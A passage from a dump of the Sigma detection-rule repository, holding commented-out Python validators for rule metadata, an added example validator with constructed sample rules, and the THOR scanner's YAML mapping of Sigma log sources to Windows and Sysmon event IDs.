(https://www.cisa.gov/tlp)\",\n    #     )\n\n    # Not in the specification\n    # def test_optional_target(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         target = self.get_rule_part(file_path=file, part_name=\"target\")\n    #         if target:\n    #             # it exists but isn't a list\n    #             if not isinstance(target, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'target' field that isn't a list.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'target' fields. (has to be a list of values even if it contains only a single value)\",\n    #     )\n    # sigma validators duplicate_title\n    # def test_duplicate_titles(self):\n    #     # This test ensure that every rule has a unique title\n    #     faulty_rules = []\n    #     titles_dict = {}\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         title = (\n    #             self.get_rule_part(file_path=file, part_name=\"title\").lower().rstrip()\n    #         )\n    #         duplicate = False\n    #         for rule, title_ in titles_dict.items():\n    #             if title == title_:\n    #                 print(\n    #                     Fore.RED\n    #                     + \"Rule {} has an already used title in {}.\".format(file, rule)\n    #                 )\n    #                 duplicate = True\n    #                 faulty_rules.append(file)\n    #                 continue\n    #         if not duplicate:\n    #             titles_dict[file] = title\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules that share the same 
'title'. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title\",\n    #     )\n\n    # def test_invalid_logsource_attributes(self):\n    #     faulty_rules = []\n    #     valid_logsource = [\n    #         'category',\n    #         'product',\n    #         'service',\n    #         'definition',\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         logsource = self.get_rule_part(\n    #             file_path=file, part_name=\"logsource\")\n    #         if not logsource:\n    #             print(Fore.RED + \"Rule {} has no 'logsource'.\".format(file))\n    #             faulty_rules.append(file)\n    #             continue\n    #         valid = True\n    #         for key in logsource:\n    #             if key.lower() not in valid_logsource:\n    #                 print(\n    #                     Fore.RED + \"Rule {} has a logsource with an invalid field ({})\".format(file, key))\n    #                 valid = False\n    #             elif not isinstance(logsource[key], str):\n    #                 print(\n    #                     Fore.RED + \"Rule {} has a logsource with an invalid field type ({})\".format(file, key))\n    #                 valid = False\n    #         if not valid:\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(faulty_rules, [], Fore.RED +\n    #                      \"There are rules with non-conform 'logsource' fields. 
Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source\")\n    # def test_field_name_typo(self):\n    #     # add \"OriginalFilename\" after Aurora switched to SourceFilename\n    #     # add \"ProviderName\" after special case powershell classic is resolved\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         # typos is a list of tuples where each tuple contains (\"The typo\", \"The correct version\")\n    #         typos = [(\"ServiceFilename\", \"ServiceFileName\"), (\"TargetFileName\", \"TargetFilename\"), (\"SourceFileName\", \"OriginalFileName\"), (\"Commandline\", \"CommandLine\"), (\"Targetobject\", \"TargetObject\"), (\"OriginalName\", \"OriginalFileName\"), (\"ImageFileName\", \"OriginalFileName\"), (\"details\", \"Details\")]\n    #         # Some fields exists in certain log sources in different forms than other log sources. We need to handle these as special cases\n    #         # We check first the logsource to handle special cases\n    #         logsource = self.get_rule_part(file_path=file, part_name=\"logsource\").values()\n    #         # add more typos in specific logsources below\n    #         if \"windefend\" in logsource:\n    #             typos += [(\"New_Value\", \"NewValue\"), (\"Old_Value\", \"OldValue\"), ('Source_Name', 'SourceName'), (\"Newvalue\", \"NewValue\"), (\"Oldvalue\", \"OldValue\"), ('Sourcename', 'SourceName')]\n    #         elif \"registry_set\" in logsource or \"registry_add\" in logsource or \"registry_event\" in logsource:\n    #             typos += [(\"Targetobject\", \"TargetObject\"), (\"Eventtype\", \"EventType\"), (\"Newname\", \"NewName\")]\n    #         elif \"process_creation\" in logsource:\n    #             typos += [(\"Parentimage\", \"ParentImage\"), (\"Integritylevel\", \"IntegrityLevel\"), (\"IntegritiLevel\", \"IntegrityLevel\")]\n    #         elif \"file_access\" in logsource:\n    #             
del(typos[typos.index((\"TargetFileName\", \"TargetFilename\"))]) # We remove the entry to \"TargetFileName\" to avoid confusion\n    #             typos += [(\"TargetFileName\", \"FileName\"), (\"TargetFilename\",\"FileName\")]\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             for search_identifier in detection:\n    #                 if isinstance(detection[search_identifier], dict):\n    #                     for field in detection[search_identifier]:\n    #                         for typo in typos:\n    #                             if typo[0] in field:\n    #                                 print(Fore.RED + \"Rule {} has a common typo ({}) which should be ({}) in selection ({}/{})\".format(file, typo[0], typo[1], search_identifier, field))\n    #                                 faulty_rules.append(file)\n\n    #     self.assertEqual(faulty_rules, [], Fore.RED + \"There are rules with common typos in field names.\")\n\n    # Sigma error SigmaModifierError\n    # def test_unknown_value_modifier(self):\n    #     known_modifiers = [\n    #         \"contains\",\n    #         \"startswith\",\n    #         \"endswith\",\n    #         \"all\",\n    #         \"base64offset\",\n    #         \"base64\",\n    #         \"utf16le\",\n    #         \"utf16be\",\n    #         \"wide\",\n    #         \"utf16\",\n    #         \"windash\",\n    #         \"re\",\n    #         \"cidr\",\n    #     ]\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             for search_identifier in detection:\n    #                 if isinstance(detection[search_identifier], dict):\n    #                     for field in detection[search_identifier]:\n    #                         if \"|\" in field:\n    #                   
          for current_modifier in field.split(\"|\")[1:]:\n    #                                 found = False\n    #                                 for target_modifier in known_modifiers:\n    #                                     if current_modifier == target_modifier:\n    #                                         found = True\n    #                                 if not found:\n    #                                     print(\n    #                                         Fore.RED\n    #                                         + \"Rule {} uses an unknown field modifier ({}/{})\".format(\n    #                                             file, search_identifier, field\n    #                                         )\n    #                                     )\n    #                                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with unknown value modifiers. 
Most often it is just a typo.\",\n    #     )\n\n    # sigma error and validator attacktag,cartag,cvetag,detection_tag,stptag,tlptag\n    # def test_optional_tags(self):\n    #     files_with_incorrect_tags = []\n    #     tags_pattern = re.compile(\n    #         r\"cve\\.\\d+\\.\\d+|attack\\.(t\\d{4}\\.\\d{3}|[gts]\\d{4})$|attack\\.[a-z_]+|car\\.\\d{4}-\\d{2}-\\d{3}|detection\\.\\w+\"\n    #     )\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tags = self.get_rule_part(file_path=file, part_name=\"tags\")\n    #         if tags:\n    #             for tag in tags:\n    #                 if tags_pattern.match(tag) == None:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the invalid tag <{}>\".format(file, tag)\n    #                     )\n    #                     files_with_incorrect_tags.append(file)\n\n    #     self.assertEqual(\n    #         files_with_incorrect_tags,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with incorrect/unknown Tags. 
(please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#tags\",\n    #     )\n\n    # sigma error and validator custom_attributes\n    # def test_optional_related(self):\n    #     faulty_rules = []\n    #     valid_type = [\"derived\", \"obsoletes\", \"merged\", \"renamed\", \"similar\"]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         related_lst = self.get_rule_part(file_path=file, part_name=\"related\")\n    #         if related_lst:\n    #             # it exists but isn't a list\n    #             if not isinstance(related_lst, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'related' field that isn't a list.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #             else:\n    #                 type_ok = True\n    #                 for ref in related_lst:\n    #                     try:\n    #                         id_str = ref[\"id\"]\n    #                         type_str = ref[\"type\"]\n    #                     except KeyError:\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} has an invalid form of 'related/type' value.\".format(\n    #                                 file\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n    #                         continue\n    #                     if not type_str in valid_type:\n    #                         type_ok = False\n    #                 # Only add one time if many bad type in the same file\n    #                 if type_ok == False:\n    #                     print(\n    #     
                    Fore.YELLOW\n    #                         + \"Rule {} has an invalid 'related/type' value.\".format(file)\n    #                     )\n    #                     faulty_rules.append(file)\n    #         else:\n    #             typo_list = []\n    #             # Add more typos\n    #             typo_list.append(\n    #                 self.get_rule_part(file_path=file, part_name=\"realted\")\n    #             )\n    #             typo_list.append(\n    #                 self.get_rule_part(file_path=file, part_name=\"relatde\")\n    #             )\n    #             typo_list.append(self.get_rule_part(file_path=file, part_name=\"relted\"))\n    #             typo_list.append(self.get_rule_part(file_path=file, part_name=\"rlated\"))\n\n    #             for i in typo_list:\n    #                 if i is not None:\n    #                     print(\n    #                         Fore.YELLOW\n    #                         + \"Rule {} has a typo in its 'related' field.\".format(file)\n    #                     )\n    #                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'related' fields. 
(check https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    # sigma error validators date_existence\n    # def test_missing_date(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         datefield = self.get_rule_part(file_path=file, part_name=\"date\")\n    #         if not datefield:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'date'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif not isinstance(datefield, str):\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'date' (should be YYYY/MM/DD).\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         elif len(datefield) != 10:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         elif datefield[4] != \"/\" or datefield[7] != \"/\":\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'date' (should be YYYY/MM/DD).\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'date' fields. (create one, e.g. 
date: 2019/01/14)\",\n    #     )\n\n    # sigma validators description_existence description_length\n    # def test_missing_description(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         descriptionfield = self.get_rule_part(\n    #             file_path=file, part_name=\"description\"\n    #         )\n    #         if not descriptionfield:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'description'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif not isinstance(descriptionfield, str):\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a 'description' field that isn't a string.\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         elif len(descriptionfield) < 16:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a really short description. Please elaborate.\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'description' fields. (create one, e.g. 
description: Detects the suspicious behaviour of process XY doing YZ)\",\n    #     )\n\n    # sigma error validators level_existence\n    # def test_level(self):\n    #     faulty_rules = []\n    #     valid_level = [\n    #         \"informational\",\n    #         \"low\",\n    #         \"medium\",\n    #         \"high\",\n    #         \"critical\",\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         level_str = self.get_rule_part(file_path=file, part_name=\"level\")\n    #         if not level_str:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'level'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif level_str not in valid_level:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has an invalid 'level' (check wiki).\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'level' fields. 
(check https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    # sigma error\n    # def test_optional_fields(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         fields_str = self.get_rule_part(file_path=file, part_name=\"fields\")\n    #         if fields_str:\n    #             # it exists but isn't a list\n    #             if not isinstance(fields_str, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'fields' field that isn't a list.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'fields' fields. (has to be a list of values even if it contains only a single value)\",\n    #     )\n\n    # sigma error\n    # def test_optional_falsepositives_listtype(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         falsepositives_str = self.get_rule_part(\n    #             file_path=file, part_name=\"falsepositives\"\n    #         )\n    #         if falsepositives_str:\n    #             # it exists but isn't a list\n    #             if not isinstance(falsepositives_str, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'falsepositives' field that isn't a list.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'falsepositives' fields. 
(has to be a list of values even if it contains only a single value)\",\n    #     )\n\n    # sigma error\n    # # Upgrade Detection Rule License  1.1\n    # def test_optional_author(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         author_str = self.get_rule_part(file_path=file, part_name=\"author\")\n    #         if author_str:\n    #             # it exists but isn't a string\n    #             if not isinstance(author_str, str):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has an 'author' field that isn't a string.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'author' fields. (has to be a string even if it names several authors)\",\n    #     )\n\n    # sigma validator custom_attributes\n    # def test_references_plural(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         reference = self.get_rule_part(file_path=file, part_name=\"reference\")\n    #         if reference:\n    #             # it exists but in singular form\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'references' fields. 
(has to be 'references' in plural form, not singular)\",\n    #     )\n\n\n# sigma-cli validators attacktag\n# def get_mitre_data():\n#     \"\"\"\n#     Use Tags from CTI subrepo to get consistent data\n#     \"\"\"\n#     cti_path = \"cti/\"\n#     cti_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), cti_path)\n\n#     # Get ATT&CK information\n#     lift = attack_client(local_path=cti_path)\n#     # Techniques\n#     MITRE_TECHNIQUES = []\n#     MITRE_TECHNIQUE_NAMES = []\n#     MITRE_PHASE_NAMES = set()\n#     MITRE_TOOLS = []\n#     MITRE_GROUPS = []\n#     # Techniques\n#     enterprise_techniques = lift.get_enterprise_techniques()\n#     for t in enterprise_techniques:\n#         MITRE_TECHNIQUE_NAMES.append(\n#             t[\"name\"].lower().replace(\" \", \"_\").replace(\"-\", \"_\")\n#         )\n#         for r in t.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_TECHNIQUES.append(r[\"external_id\"].lower())\n#         if \"kill_chain_phases\" in t:\n#             for kc in t[\"kill_chain_phases\"]:\n#                 if \"phase_name\" in kc:\n#                     MITRE_PHASE_NAMES.add(kc[\"phase_name\"].replace(\"-\", \"_\"))\n#     # Tools / Malware\n#     enterprise_tools = lift.get_enterprise_tools()\n#     for t in enterprise_tools:\n#         for r in t.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_TOOLS.append(r[\"external_id\"].lower())\n#     enterprise_malware = lift.get_enterprise_malware()\n#     for m in enterprise_malware:\n#         for r in m.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_TOOLS.append(r[\"external_id\"].lower())\n#     # Groups\n#     enterprise_groups = lift.get_enterprise_groups()\n#     for g in enterprise_groups:\n#         for r in g.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_GROUPS.append(r[\"external_id\"].lower())\n\n#     # Debugging\n#    
 print(\n#         \"MITRE ATT&CK LIST LENGTHS: %d %d %d %d %d\"\n#         % (\n#             len(MITRE_TECHNIQUES),\n#             len(MITRE_TECHNIQUE_NAMES),\n#             len(list(MITRE_PHASE_NAMES)),\n#             len(MITRE_GROUPS),\n#             len(MITRE_TOOLS),\n#         )\n#     )\n\n#     # Combine all IDs to a big tag list\n#     return [\n#         \"attack.\" + item\n#         for item in MITRE_TECHNIQUES\n#         + MITRE_TECHNIQUE_NAMES\n#         + list(MITRE_PHASE_NAMES)\n#         + MITRE_GROUPS\n#         + MITRE_TOOLS\n#     ]\n\n\nif __name__ == \"__main__\":\n    init(autoreset=True)\n    # Run the tests\n    unittest.main()\n"
  },
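The checks that the commented-out tests above spell out one field at a time, folded into a single validator as an added example (this is not the repository's own test code). It follows the v2 conventions of tests/validate-sigma-schema/sigma-schema.json (ISO 8601 YYYY-MM-DD dates, 'obsolete' rather than 'obsoletes' as a related type), takes an already-parsed rule dict so it needs no PyYAML, and generalises the hard-coded typo lists ('realted', 'relatde', singular 'reference') into a close-match check over every unknown top-level key. The two sample rules, including their UUID and URL values, are constructed.

```python
"""Added example, not the repository's test code: a compact Sigma rule metadata
validator. Rules are passed as already-parsed dicts (what yaml.safe_load returns)."""
import difflib
import re

# Date pattern taken from the v2 JSON schema in this repository.
ISO_DATE = re.compile(r"^\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])$")
VALID_LEVELS = {"informational", "low", "medium", "high", "critical"}
VALID_RELATED = {"derived", "obsolete", "merged", "renamed", "similar"}
KNOWN_KEYS = {
    "title", "id", "related", "name", "taxonomy", "status", "description",
    "license", "author", "references", "date", "modified", "logsource",
    "detection", "fields", "falsepositives", "level", "tags",
}


def validate_rule(rule: dict) -> list[str]:
    """Return the problems found in one parsed rule; an empty list means clean."""
    problems: list[str] = []
    for key in ("title", "logsource", "detection"):
        if key not in rule:
            problems.append(f"missing required field '{key}'")
    desc = rule.get("description")
    if not isinstance(desc, str):
        problems.append("missing or non-string 'description'")
    elif len(desc) < 16:
        problems.append("'description' is really short, please elaborate")
    for key in ("date", "modified"):
        # str() also normalises the datetime.date PyYAML yields for an unquoted
        # 2019-01-14, so quoted and unquoted dates are judged by the same regex
        if key in rule and not ISO_DATE.match(str(rule[key])):
            problems.append(f"'{key}' must be YYYY-MM-DD, got {rule[key]!r}")
    if "level" in rule and rule["level"] not in VALID_LEVELS:
        problems.append(f"invalid 'level' {rule['level']!r}")
    for key in ("fields", "falsepositives", "references", "tags"):
        if key in rule and not isinstance(rule[key], list):
            problems.append(f"'{key}' must be a list, even for a single value")
    if "author" in rule and not isinstance(rule["author"], str):
        problems.append("'author' must be a string, even for several authors")
    related = rule.get("related")
    if related is not None:
        if not isinstance(related, list):
            problems.append("'related' must be a list")
        else:
            for ref in related:
                if not isinstance(ref, dict) or not all(k in ref for k in ("id", "type")):
                    problems.append("'related' entries need both 'id' and 'type'")
                elif ref["type"] not in VALID_RELATED:
                    problems.append(f"invalid related/type {ref['type']!r}")
    # Unknown top-level keys catch typos such as 'realted' and the singular
    # 'reference' that the tests above look for one spelling at a time.
    for key in rule:
        if key not in KNOWN_KEYS:
            guess = difflib.get_close_matches(key, KNOWN_KEYS, n=1, cutoff=0.75)
            hint = f" (did you mean '{guess[0]}'?)" if guess else ""
            problems.append(f"unknown field '{key}'{hint}")
    return problems


# Constructed samples: one rule with several of the defects above, one clean rule.
BAD_RULE = {
    "title": "Example",
    "description": "too short",
    "date": "2019/01/14",
    "level": "hi",
    "author": ["a", "b"],
    "realted": [{"id": "00000000-0000-4000-8000-000000000001", "type": "obsoletes"}],
    "reference": "https://example.invalid/post",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {"sel": {"Image|endswith": "\\dllhost.exe"}, "condition": "sel"},
}
GOOD_RULE = {
    "title": "Suspicious dllhost Parent",
    "description": "Detects the suspicious behaviour of process XY doing YZ",
    "date": "2019-01-14",
    "modified": "2024-08-08",
    "level": "high",
    "author": "someone, someone else",
    "references": ["https://example.invalid/post"],
    "related": [{"id": "00000000-0000-4000-8000-000000000001", "type": "obsolete"}],
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {"sel": {"Image|endswith": "\\dllhost.exe"}, "condition": "sel"},
}

if __name__ == "__main__":
    for name, rule in (("BAD_RULE", BAD_RULE), ("GOOD_RULE", GOOD_RULE)):
        print(name, validate_rule(rule) or "clean")
```

Feeding the validator the output of `yaml.safe_load()` per rule file reproduces the per-file loop of the tests above; the unknown-key check is what makes the typo lists unnecessary.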
  {
    "path": "tests/thor.yml",
    "content": "title: THOR\norder: 20\nbackends:\n    - thor\n# this configuration differs from other configurations and can not be used\n# with the sigmac tool. This configuration is used by the ioc scanners THOR and SPARK.\nlogsources:\n    # log source configurations for generic sigma rules\n    process_creation_1:\n        category: process_creation\n        product: windows\n        conditions:\n            EventID: 1\n        rewrite:\n            product: windows\n            service: sysmon\n    process_creation_2:\n        category: process_creation\n        product: windows\n        conditions:\n            EventID: 4688\n        rewrite:\n            product: windows\n            service: security\n        fieldmappings:\n            Image: NewProcessName\n            ParentImage: ParentProcessName\n    file_change:\n        category: file_change\n        product: windows\n        conditions:\n            EventID: 2\n        rewrite:\n            product: windows\n            service: sysmon\n    network_connection:\n        category: network_connection\n        product: windows\n        conditions:\n            EventID: 3\n        rewrite:\n            product: windows\n            service: sysmon\n    sysmon_status1:\n        category: sysmon_status\n        product: windows\n        conditions:\n            EventID: 4\n        rewrite:\n            product: windows\n            service: sysmon\n    sysmon_status2:\n        category: sysmon_status\n        product: windows\n        conditions:\n            EventID: 16\n        rewrite:\n            product: windows\n            service: sysmon\n    process_terminated:\n        category: process_termination\n        product: windows\n        conditions:\n            EventID: 5\n        rewrite:\n            product: windows\n            service: sysmon\n    driver_loaded:\n        category: driver_load\n        product: windows\n        conditions:\n            EventID: 6\n        rewrite:\n            
product: windows\n            service: sysmon\n    image_loaded:\n        category: image_load\n        product: windows\n        conditions:\n            EventID: 7\n        rewrite:\n            product: windows\n            service: sysmon\n    create_remote_thread:\n        category: create_remote_thread\n        product: windows\n        conditions:\n            EventID: 8\n        rewrite:\n            product: windows\n            service: sysmon\n    raw_access_thread:\n        category: raw_access_thread\n        product: windows\n        conditions:\n            EventID: 9\n        rewrite:\n            product: windows\n            service: sysmon\n    process_access:\n        category: process_access\n        product: windows\n        conditions:\n            EventID: 10\n        rewrite:\n            product: windows\n            service: sysmon\n    file_creation:\n        category: file_event\n        product: windows\n        conditions:\n            EventID: 11\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_event1:\n        category: registry_event\n        product: windows\n        conditions:\n            EventID: 12\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_event2:\n        category: registry_event\n        product: windows\n        conditions:\n            EventID: 13\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_event3:\n        category: registry_event\n        product: windows\n        conditions:\n            EventID: 14\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_add:\n        category: registry_add\n        product: windows\n        conditions:\n            EventID: 12\n            EventType: CreateKey\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_delete_key:\n        category: registry_delete\n        product: 
windows\n        conditions:\n            EventID: 12\n            EventType: DeleteKey\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_delete_value:\n        category: registry_delete\n        product: windows\n        conditions:\n            EventID: 12\n            EventType: DeleteValue\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_set:\n        category: registry_set\n        product: windows\n        conditions:\n            EventID: 13\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_rename:\n        category: registry_rename\n        product: windows\n        conditions:\n            EventID: 14\n        rewrite:\n            product: windows\n            service: sysmon\n    create_stream_hash:\n        category: create_stream_hash\n        product: windows\n        conditions:\n            EventID: 15\n        rewrite:\n            product: windows\n            service: sysmon\n    pipe_created1:\n        category: pipe_created\n        product: windows\n        conditions:\n            EventID: 17\n        rewrite:\n            product: windows\n            service: sysmon\n    pipe_created2:\n        category: pipe_created\n        product: windows\n        conditions:\n            EventID: 18\n        rewrite:\n            product: windows\n            service: sysmon\n    wmi_event1:\n        category: wmi_event\n        product: windows\n        conditions:\n            EventID: 19\n        rewrite:\n            product: windows\n            service: sysmon\n    wmi_event2:\n        category: wmi_event\n        product: windows\n        conditions:\n            EventID: 20\n        rewrite:\n            product: windows\n            service: sysmon\n    wmi_event3:\n        category: wmi_event\n        product: windows\n        conditions:\n            EventID: 21\n        rewrite:\n            product: windows\n          
  service: sysmon\n    dns_query:\n        category: dns_query\n        product: windows\n        conditions:\n            EventID: 22\n        rewrite:\n            product: windows\n            service: sysmon\n    file_delete:\n        category: file_delete\n        product: windows\n        conditions:\n            EventID: 23\n        rewrite:\n            product: windows\n            service: sysmon\n    clipboard_change:\n        category: clipboard_change\n        product: windows\n        conditions:\n            EventID: 24\n        rewrite:\n            product: windows\n            service: sysmon\n    process_tampering:\n        category: process_tampering\n        product: windows\n        conditions:\n            EventID: 25\n        rewrite:\n            product: windows\n            service: sysmon\n    file_delete_detected:\n        category: file_delete_detected\n        product: windows\n        conditions:\n            EventID: 26\n        rewrite:\n            product: windows\n            service: sysmon\n    file_block_executable:\n        category: file_block_executable\n        product: windows\n        conditions:\n            EventID: 27\n        rewrite:\n            product: windows\n            service: sysmon\n    file_block_shredding:\n        category: file_block_shredding\n        product: windows\n        conditions:\n            EventID: 28\n        rewrite:\n            product: windows\n            service: sysmon\n    file_executable_detected:\n        category: file_executable_detected\n        product: windows\n        conditions:\n            EventID: 29\n        rewrite:\n            product: windows\n            service: sysmon\n    sysmon_error:\n        category: sysmon_error\n        product: windows\n        conditions:\n            EventID: 255\n        rewrite:\n            product: windows\n            service: sysmon\n    # PowerShell Operational\n    ps_module:\n        category: ps_module\n        product: 
windows\n        conditions:\n            EventID: 4103\n        rewrite:\n            product: windows\n            service: powershell\n    ps_script:\n        category: ps_script\n        product: windows\n        conditions:\n            EventID: 4104\n        rewrite:\n            product: windows\n            service: powershell\n    # Powershell \"classic\" channel\n    ps_classic_start:\n        category: ps_classic_start\n        product: windows\n        conditions:\n            EventID: 400\n        rewrite:\n            product: windows\n            service: powershell-classic\n    ps_classic_provider_start:\n        category: ps_classic_provider_start\n        product: windows\n        conditions:\n            EventID: 600\n        rewrite:\n            product: windows\n            service: powershell-classic\n    ps_classic_script:\n        category: ps_classic_script\n        product: windows\n        conditions:\n            EventID: 800\n        rewrite:\n            product: windows\n            service: powershell-classic\n    # target system configurations\n    windows-application:\n        product: windows\n        service: application\n        sources:\n            - \"WinEventLog:Application\"\n    windows-security:\n        product: windows\n        service: security\n        sources:\n            - \"WinEventLog:Security\"\n    windows-system:\n        product: windows\n        service: system\n        sources:\n            - \"WinEventLog:System\"\n    windows-ntlm:\n        product: windows\n        service: ntlm\n        sources:\n            - \"WinEventLog:Microsoft-Windows-NTLM/Operational\"\n    windows-sysmon:\n        product: windows\n        service: sysmon\n        sources:\n            - \"WinEventLog:Microsoft-Windows-Sysmon/Operational\"\n    windows-powershell:\n        product: windows\n        service: powershell\n        sources:\n            - \"WinEventLog:Microsoft-Windows-PowerShell/Operational\"\n            - 
\"WinEventLog:PowerShellCore/Operational\"\n    windows-classicpowershell:\n        product: windows\n        service: powershell-classic\n        sources:\n            - \"WinEventLog:Windows PowerShell\"\n    windows-taskscheduler:\n        product: windows\n        service: taskscheduler\n        sources:\n            - \"WinEventLog:Microsoft-Windows-TaskScheduler/Operational\"\n    windows-wmi:\n        product: windows\n        service: wmi\n        sources:\n            - \"WinEventLog:Microsoft-Windows-WMI-Activity/Operational\"\n    windows-dhcp:\n        product: windows\n        service: dhcp\n        sources:\n            - \"WinEventLog:Microsoft-Windows-DHCP-Server/Operational\"\n    windows-printservice-admin:\n        product: windows\n        service: printservice-admin\n        sources:\n            - \"WinEventLog:Microsoft-Windows-PrintService/Admin\"\n    windows-smbclient-security:\n        product: windows\n        service: smbclient-security\n        sources:\n            - \"WinEventLog:Microsoft-Windows-SmbClient/Security\"\n    windows-smbclient-connectivity:\n        product: windows\n        service: smbclient-connectivity\n        sources:\n            - \"WinEventLog:Microsoft-Windows-SmbClient/Connectivity\"\n    windows-smbserver-connectivity:\n        product: windows\n        service: smbserver-connectivity\n        sources:\n            - \"WinEventLog:Microsoft-Windows-SMBServer/Connectivity\"\n    windows-printservice-operational:\n        product: windows\n        service: printservice-operational\n        sources:\n            - \"WinEventLog:Microsoft-Windows-PrintService/Operational\"\n    windows-terminalservices-localsessionmanager-operational:\n        product: windows\n        service: terminalservices-localsessionmanager\n        sources:\n            - 'WinEventLog:Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'\n    windows-codeintegrity-operational:\n        product: windows\n        service: 
